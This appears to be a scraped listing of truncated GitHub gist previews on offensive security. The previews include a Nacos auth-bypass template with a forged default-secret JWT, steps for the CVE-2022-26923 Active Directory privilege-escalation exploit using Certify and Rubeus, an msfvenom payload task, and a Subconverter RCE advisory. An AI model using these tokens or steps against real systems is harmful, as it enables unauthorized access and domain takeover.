Esonhugh

<html>
  <head>
    <title>Playground of hooks</title>
    <script src="/hook.js"></script>
  </head>
  <body>
    <script>
// console.hooks.hookfunc(console, "log")

obj = {

Esonhugh

Bloodhound as a service (Kubernetes Deployments/Docker Compose)

Usage

1. Change password (default password: default_admin_passwords)
2. Change user (default user: esonhugh)
3. Change ingress host name to your team server
4. Deploy it!
5. kubectl apply -f deployment-service.yaml -f ingress.yaml -f configmap.yaml # -n <change namespace you deploy>
6. use pipx install git+https://github.com/exploide/bloodhound-cli.git

Esonhugh

# automatically set the AWS environment variables from the json output of `aws sts assume-role` 
aws_sts_env () {
        if [[ -n "$1" ]]
        then
            local cred=$1
        fi
        if [[ -z "$cred" ]]
        then
                echo "Usage: $0 \`json\`"
                echo "Example: export cred=\`aws sts assume-role --role-arn xxxx --role-session-name xxxx|jq ".Credentials"\`"

Esonhugh

{
    "version": "2.0.0",
    "tasks": [
        {
            "label": "msfvenom payload creating",
            "type": "shell",
            "detail": "msfvenom payload creating task",
            "problemMatcher": [],
            "command": [
                "msfvenom",

0xdevalias

Reverse Engineering Webpack Apps

Some notes and techniques for reverse engineering Webpack (and a little bit about React/Vue/Angular) apps.

Table of Contents

• Webpack (and similar bundlers) Chunk Format
  • AST Structure
• Basic minified example

0prrr

Recommended Read / Watch

• https://blog.xpnsec.com/
• https://www.hexacorn.com/
• https://modexp.wordpress.com/
• https://klezvirus.github.io/
• https://zerosum0x0.blogspot.com/
• https://www.binarly.io/posts/index.html
• https://0xdarkvortex.dev/blogs/
• https://cocomelonc.github.io/
• https://pre.empt.blog/

Esonhugh

id: nacos-bypass-authentication

variables:
  #token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.vqhkMLKmquQ6R5AD6VWrTOqgClC599nnAQgQLHhPcLc
  # token is signed with a very long time expire.
  # token exp -1
  token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6LTF9.ybUomrBRXZhbUMWVgXRz3Q6zndbF-Zdk4RGpCnV-Ofs

info:
  name: Nacos Bypass Auth with default jwt secret

dmchell

// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

// Steps:
// 1.       Escalate on any workstation (hint: krbrelayup ftw)
// 2.       Execute UpdateMachineAccount.exe as SYSTEM
// 3.       Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4.       Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)

CwithW

Subconverter v0.7.2 unauthorized RCE

Software Link(Subconverter): https://github.com/tindy2013/subconverter

Affected versions: Subconverter v0.7.2, < v0.7.2-ce8d2bd

Description

A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows unauthorized attackers to execute arbitrary code via crafted config and url parameters.

Esonhugh

# https://twitter.com/brsn76945860/status/1171233054951501824
# pip install mmh3
#
# in python 3
# Author: https://gist.github.com/yehgdotnet
#
# Author: Esonhugh (https://gist.github.com/Esonhugh) more automatic
# date: 2021/12/07 23:38 UTC+0800

import mmh3